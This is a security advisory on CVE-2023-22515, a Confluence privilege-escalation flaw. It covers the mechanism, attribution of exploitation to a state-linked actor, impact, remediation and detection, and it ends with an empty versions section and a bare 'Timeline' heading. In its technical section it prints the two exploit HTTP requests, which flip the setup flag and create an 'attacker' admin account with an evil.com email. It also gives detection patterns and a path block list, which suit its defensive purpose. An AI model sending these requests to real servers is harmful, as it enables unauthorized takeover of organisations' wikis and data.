CVE-2023-22515: Atlassian Confluence — Privilege Escalation to Admin

Background

Atlassian Confluence is one of the most widely used enterprise collaboration and wiki platforms, deployed by thousands of organisations globally for documentation, project management, and knowledge management. Confluence Data Center and Server deployments store sensitive internal documentation, project specifications, credentials, and institutional knowledge that attackers find extremely valuable.

CVE-2023-22515 is a zero-day privilege escalation vulnerability disclosed by Atlassian on October 4, 2023, with a CVSS score of 10.0. The vulnerability allows unauthenticated external attackers to create administrator accounts on publicly-accessible Confluence instances. Atlassian noted that a limited number of customers had already been attacked before the advisory was published, and CISA’s KEV listing confirmed active exploitation. The vulnerability is particularly significant because Confluence typically stores sensitive internal documentation that would be of high intelligence value.

Technical Mechanism

CVE-2023-22515 exploits a flaw in Confluence’s setup and configuration endpoint handling. Confluence’s initial setup wizard includes an endpoint for creating the first administrator account. This endpoint (/setup/setupadministrator.action) is supposed to be inaccessible on a system that has already been configured with administrator accounts — but the access control check can be bypassed.

The vulnerability is in the Confluence servlet filter chain. Normally, Confluence checks whether initial setup has been completed and restricts access to setup endpoints accordingly. However, certain request manipulation techniques allow an attacker to access the setup endpoint on an already-configured Confluence instance.

Exploitation technique:

# Accessing the normally-restricted setup endpoint
POST /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: confluence.target.com
Content-Type: application/x-www-form-urlencoded

# This request manipulates the application's setup state flag

# Follow-up request to create admin account
POST /setup/setupadministrator.action HTTP/1.1
Host: confluence.target.com
Content-Type: application/x-www-form-urlencoded

username=attacker&fullName=System+Admin&email=attacker%40evil.com&password=P%40ssw0rd&confirm=P%40ssw0rd&setup-next-button=Next

The key mechanism is that Confluence uses OGNL (Object-Graph Navigation Language) for expression evaluation in certain contexts, and the bootstrapStatusProvider.applicationConfig.setupComplete parameter is evaluated as an OGNL expression that modifies the application’s runtime state, setting the “setup complete” flag to false. This tricks Confluence into presenting the setup wizard as if the instance is unconfigured.

Once the setup wizard is accessible, creating a new administrator account is trivial. With administrator access, the attacker can:

• Install plugins containing arbitrary Java code (full RCE)
• Export all Confluence spaces and pages
• Access user credentials stored in Confluence’s database
• Modify Confluence configuration including authentication providers

Real-World Exploitation Evidence

Microsoft’s threat intelligence team (MSTIC) attributed exploitation of CVE-2023-22515 to Storm-0062, a threat actor linked to Chinese state-sponsored espionage. Key observations:

• Zero-day exploitation: Storm-0062 exploited the vulnerability beginning September 14, 2023, three weeks before Atlassian’s October 4 advisory. This indicates the vulnerability was obtained through prior research or purchase.
• Targeted initial access: Unlike many exploited vulnerabilities, early exploitation appeared targeted at specific organisations rather than opportunistic mass exploitation.
• Intelligence gathering: Post-exploitation activity focused on enumerating and exfiltrating Confluence content rather than deploying ransomware or cryptominers.
• Plugin-based persistence: Attackers installed malicious Confluence plugins to maintain persistent access and execute code.

After public disclosure, broader exploitation including opportunistic actors was documented, with multiple security vendors reporting exploitation attempts against exposed Confluence instances globally.

Impact Assessment

Confluence administrator access provides significant reach:

• Complete content access: All Confluence spaces, pages, attachments, and comments are readable — this includes sensitive internal documentation, project plans, security architecture documents, and credentials stored in pages.
• User credential access: Confluence stores hashed user credentials; local authentication hashes can be extracted and cracked.
• Remote code execution via plugins: Confluence’s plugin system executes arbitrary Java code in the JVM context, providing full server-side RCE.
• Macro execution: Malicious wiki macros can be used for continued code execution in user browsers (XSS pivot) or server-side execution.
• Integration credential theft: Confluence integrates with Jira, Active Directory, LDAP, and SSO systems; configuration credentials for these integrations are accessible.

Affected Versions

Note: Atlassian Confluence Cloud is not affected.

Remediation Steps

1. Upgrade Confluence: Apply the fixed versions immediately. For environments where immediate upgrade is not possible:

2. Restrict network access (interim): Block access to the following paths at the network perimeter:

   /setup/*
   /server-info.action
   /bootstrapstatusprovider/*

3. Check for compromise indicators:

   • Review the list of Confluence administrator accounts for unexpected entries
   • Check the Confluence audit log for account creation events
   • Review installed plugins for any not recognised by your team

4. Disable Confluence temporarily: If you cannot immediately patch or restrict access, take the instance offline until remediation is complete.

5. Rotate all service account credentials: If compromise is suspected, rotate all credentials stored in Confluence pages and in Confluence’s integration configurations.

6. Review Confluence logs: Check atlassian-confluence.log and access logs for requests to setup endpoints.

Detection Guidance

Log sources:

• Confluence application log: <confluence-home>/logs/atlassian-confluence.log
• Access log: <confluence-install>/logs/localhost_access_log.*.txt
• Audit log: Administration > Audit Log in the Confluence UI

Suspicious patterns:

POST /server-info.action?bootstrapStatusProvider
POST /setup/setupadministrator.action
GET /setup/setupstart.action

Indicators of Compromise:

• Unexpected entries in Administration > Users for accounts created outside normal processes
• New plugins in Administration > Manage apps/plugins not installed by your team
• Audit log entries showing admin account creation via the setup wizard
• HTTP 200 responses to /setup/ endpoints (should return 403 or redirect)

Suricata signature:

alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"Atlassian Confluence CVE-2023-22515 Exploit Attempt"; flow:established,to_server; http.uri; content:"/setup/setupadministrator.action"; sid:9000225; rev:1;)

Timeline